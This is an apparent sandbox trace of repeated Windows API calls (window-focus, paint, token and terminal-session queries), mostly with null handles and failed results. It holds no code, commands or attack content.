[0072.125] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.125] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.125] GetTickCount () returned 0x1f1ec [0072.126] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.126] SetForegroundWindow (hWnd=0x0) returned 0 [0072.126] BringWindowToTop (hWnd=0x0) returned 0 [0072.126] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x49c) returned 1 [0072.126] GetTokenInformation (in: TokenHandle=0x49c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.126] GetLastError () returned 0x7a [0072.126] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.126] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.127] WTSFreeMemory (pMemory=0x0) [0072.127] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.127] TextOutW (hdc=0x0, x=1554, y=3649, lpString="", c=0) returned 1 [0072.127] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.127] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.127] GetTickCount () returned 0x1f1ec [0072.128] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.128] SetForegroundWindow (hWnd=0x0) returned 0 [0072.128] BringWindowToTop (hWnd=0x0) returned 0 [0072.128] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4a0) returned 1 [0072.128] GetTokenInformation (in: TokenHandle=0x4a0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.128] GetLastError () returned 0x7a [0072.128] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.128] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.129] WTSFreeMemory (pMemory=0x0) [0072.129] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.129] TextOutW (hdc=0x0, x=1564, y=3674, lpString="", c=0) returned 1 [0072.129] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.129] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.129] GetTickCount () returned 0x1f1ec [0072.130] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.130] SetForegroundWindow (hWnd=0x0) returned 0 [0072.130] BringWindowToTop (hWnd=0x0) returned 0 [0072.130] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4a4) returned 1 [0072.131] GetTokenInformation (in: TokenHandle=0x4a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.131] GetLastError () returned 0x7a [0072.131] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.131] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.131] WTSFreeMemory (pMemory=0x0) [0072.131] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.131] TextOutW (hdc=0x0, x=1574, y=3699, lpString="", c=0) returned 1 [0072.131] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.131] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.131] GetTickCount () returned 0x1f1ec [0072.134] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.134] SetForegroundWindow (hWnd=0x0) returned 0 [0072.134] BringWindowToTop (hWnd=0x0) returned 0 [0072.134] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4a8) returned 1 [0072.134] GetTokenInformation (in: TokenHandle=0x4a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.134] GetLastError () returned 0x7a [0072.134] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.134] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.135] WTSFreeMemory (pMemory=0x0) [0072.135] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.135] TextOutW (hdc=0x0, x=1584, y=3724, lpString="", c=0) returned 1 [0072.135] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.135] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.135] GetTickCount () returned 0x1f1ec [0072.136] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.136] SetForegroundWindow (hWnd=0x0) returned 0 [0072.136] BringWindowToTop (hWnd=0x0) returned 0 [0072.136] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4ac) returned 1 [0072.136] GetTokenInformation (in: TokenHandle=0x4ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.136] GetLastError () returned 0x7a [0072.136] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.136] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.141] WTSFreeMemory (pMemory=0x0) [0072.141] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.141] TextOutW (hdc=0x0, x=1594, y=3749, lpString="", c=0) returned 1 [0072.141] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.141] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.141] GetTickCount () returned 0x1f1fc [0072.143] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.143] SetForegroundWindow (hWnd=0x0) returned 0 [0072.143] BringWindowToTop (hWnd=0x0) returned 0 [0072.143] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4b0) returned 1 [0072.143] GetTokenInformation (in: TokenHandle=0x4b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.143] GetLastError () returned 0x7a [0072.143] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.143] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.144] WTSFreeMemory (pMemory=0x0) [0072.144] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.144] TextOutW (hdc=0x0, x=1604, y=3774, lpString="", c=0) returned 1 [0072.144] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.144] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.144] GetTickCount () returned 0x1f1fc [0072.145] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.145] SetForegroundWindow (hWnd=0x0) returned 0 [0072.145] BringWindowToTop (hWnd=0x0) returned 0 [0072.145] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4b4) returned 1 [0072.145] GetTokenInformation (in: TokenHandle=0x4b4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.145] GetLastError () returned 0x7a [0072.145] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.145] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.146] WTSFreeMemory (pMemory=0x0) [0072.146] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.146] TextOutW (hdc=0x0, x=1614, y=3799, lpString="", c=0) returned 1 [0072.146] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.146] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.146] GetTickCount () returned 0x1f20c [0072.147] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.147] SetForegroundWindow (hWnd=0x0) returned 0 [0072.147] BringWindowToTop (hWnd=0x0) returned 0 [0072.147] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4b8) returned 1 [0072.147] GetTokenInformation (in: TokenHandle=0x4b8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.147] GetLastError () returned 0x7a [0072.147] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.147] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.148] WTSFreeMemory (pMemory=0x0) [0072.148] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.148] TextOutW (hdc=0x0, x=1624, y=3824, lpString="", c=0) returned 1 [0072.148] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.148] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.148] GetTickCount () returned 0x1f20c [0072.152] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.152] SetForegroundWindow (hWnd=0x0) returned 0 [0072.152] BringWindowToTop (hWnd=0x0) returned 0 [0072.152] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4bc) returned 1 [0072.152] GetTokenInformation (in: TokenHandle=0x4bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.152] GetLastError () returned 0x7a [0072.152] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.153] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.153] WTSFreeMemory (pMemory=0x0) [0072.153] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.153] TextOutW (hdc=0x0, x=1634, y=3849, lpString="", c=0) returned 1 [0072.153] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.153] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.153] GetTickCount () returned 0x1f20c [0072.167] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.167] SetForegroundWindow (hWnd=0x0) returned 0 [0072.168] BringWindowToTop (hWnd=0x0) returned 0 [0072.168] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4c0) returned 1 [0072.168] GetTokenInformation (in: TokenHandle=0x4c0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.168] GetLastError () returned 0x7a [0072.168] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.168] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.168] WTSFreeMemory (pMemory=0x0) [0072.168] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.169] TextOutW (hdc=0x0, x=1644, y=3874, lpString="", c=0) returned 1 [0072.169] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.169] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.169] GetTickCount () returned 0x1f21b [0072.169] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.169] SetForegroundWindow (hWnd=0x0) returned 0 [0072.170] BringWindowToTop (hWnd=0x0) returned 0 [0072.170] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4c4) returned 1 [0072.170] GetTokenInformation (in: TokenHandle=0x4c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.170] GetLastError () returned 0x7a [0072.170] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.170] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.170] WTSFreeMemory (pMemory=0x0) [0072.170] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.170] TextOutW (hdc=0x0, x=1654, y=3899, lpString="", c=0) returned 1 [0072.170] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.170] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.171] GetTickCount () returned 0x1f21b [0072.174] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.174] SetForegroundWindow (hWnd=0x0) returned 0 [0072.174] BringWindowToTop (hWnd=0x0) returned 0 [0072.174] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4c8) returned 1 [0072.174] GetTokenInformation (in: TokenHandle=0x4c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.174] GetLastError () returned 0x7a [0072.174] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.174] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.175] WTSFreeMemory (pMemory=0x0) [0072.175] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.175] TextOutW (hdc=0x0, x=1664, y=3924, lpString="", c=0) returned 1 [0072.175] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.175] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.175] GetTickCount () returned 0x1f22b [0072.178] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.179] SetForegroundWindow (hWnd=0x0) returned 0 [0072.179] BringWindowToTop (hWnd=0x0) returned 0 [0072.179] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4cc) returned 1 [0072.179] GetTokenInformation (in: TokenHandle=0x4cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.179] GetLastError () returned 0x7a [0072.179] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.179] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.179] WTSFreeMemory (pMemory=0x0) [0072.179] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.180] TextOutW (hdc=0x0, x=1674, y=3949, lpString="", c=0) returned 1 [0072.180] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.180] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.180] GetTickCount () returned 0x1f22b [0072.181] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.181] SetForegroundWindow (hWnd=0x0) returned 0 [0072.181] BringWindowToTop (hWnd=0x0) returned 0 [0072.181] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4d0) returned 1 [0072.181] GetTokenInformation (in: TokenHandle=0x4d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.181] GetLastError () returned 0x7a [0072.181] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.181] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.182] WTSFreeMemory (pMemory=0x0) [0072.182] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.182] TextOutW (hdc=0x0, x=1684, y=3974, lpString="", c=0) returned 1 [0072.182] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.182] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.182] GetTickCount () returned 0x1f22b [0072.183] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.183] SetForegroundWindow (hWnd=0x0) returned 0 [0072.183] BringWindowToTop (hWnd=0x0) returned 0 [0072.183] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4d4) returned 1 [0072.183] GetTokenInformation (in: TokenHandle=0x4d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.183] GetLastError () returned 0x7a [0072.183] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.183] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.184] WTSFreeMemory (pMemory=0x0) [0072.184] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.184] TextOutW (hdc=0x0, x=1694, y=3999, lpString="", c=0) returned 1 [0072.184] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.184] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.184] GetTickCount () returned 0x1f22b [0072.185] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.185] SetForegroundWindow (hWnd=0x0) returned 0 [0072.185] BringWindowToTop (hWnd=0x0) returned 0 [0072.185] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4d8) returned 1 [0072.185] GetTokenInformation (in: TokenHandle=0x4d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.185] GetLastError () returned 0x7a [0072.185] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.185] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.185] WTSFreeMemory (pMemory=0x0) [0072.186] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.186] TextOutW (hdc=0x0, x=1704, y=4024, lpString="", c=0) returned 1 [0072.186] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.186] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.186] GetTickCount () returned 0x1f22b [0072.187] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.187] SetForegroundWindow (hWnd=0x0) returned 0 [0072.187] BringWindowToTop (hWnd=0x0) returned 0 [0072.187] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4dc) returned 1 [0072.187] GetTokenInformation (in: TokenHandle=0x4dc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.187] GetLastError () returned 0x7a [0072.187] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.187] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.187] WTSFreeMemory (pMemory=0x0) [0072.188] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.188] TextOutW (hdc=0x0, x=1714, y=4049, lpString="", c=0) returned 1 [0072.188] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.188] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.188] GetTickCount () returned 0x1f22b [0072.190] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.190] SetForegroundWindow (hWnd=0x0) returned 0 [0072.190] BringWindowToTop (hWnd=0x0) returned 0 [0072.194] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4e0) returned 1 [0072.194] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.194] GetLastError () returned 0x7a [0072.194] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.194] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.195] WTSFreeMemory (pMemory=0x0) [0072.195] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.195] TextOutW (hdc=0x0, x=1724, y=4074, lpString="", c=0) returned 1 [0072.195] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.195] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.195] GetTickCount () returned 0x1f23a [0072.196] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.196] SetForegroundWindow (hWnd=0x0) returned 0 [0072.196] BringWindowToTop (hWnd=0x0) returned 0 [0072.196] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4e4) returned 1 [0072.196] GetTokenInformation (in: TokenHandle=0x4e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.196] GetLastError () returned 0x7a [0072.196] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.196] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.196] WTSFreeMemory (pMemory=0x0) [0072.196] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.197] TextOutW (hdc=0x0, x=1734, y=4099, lpString="", c=0) returned 1 [0072.197] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.197] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.197] GetTickCount () returned 0x1f23a [0072.198] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.198] SetForegroundWindow (hWnd=0x0) returned 0 [0072.198] BringWindowToTop (hWnd=0x0) returned 0 [0072.198] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4e8) returned 1 [0072.198] GetTokenInformation (in: TokenHandle=0x4e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.199] GetLastError () returned 0x7a [0072.199] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.199] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, 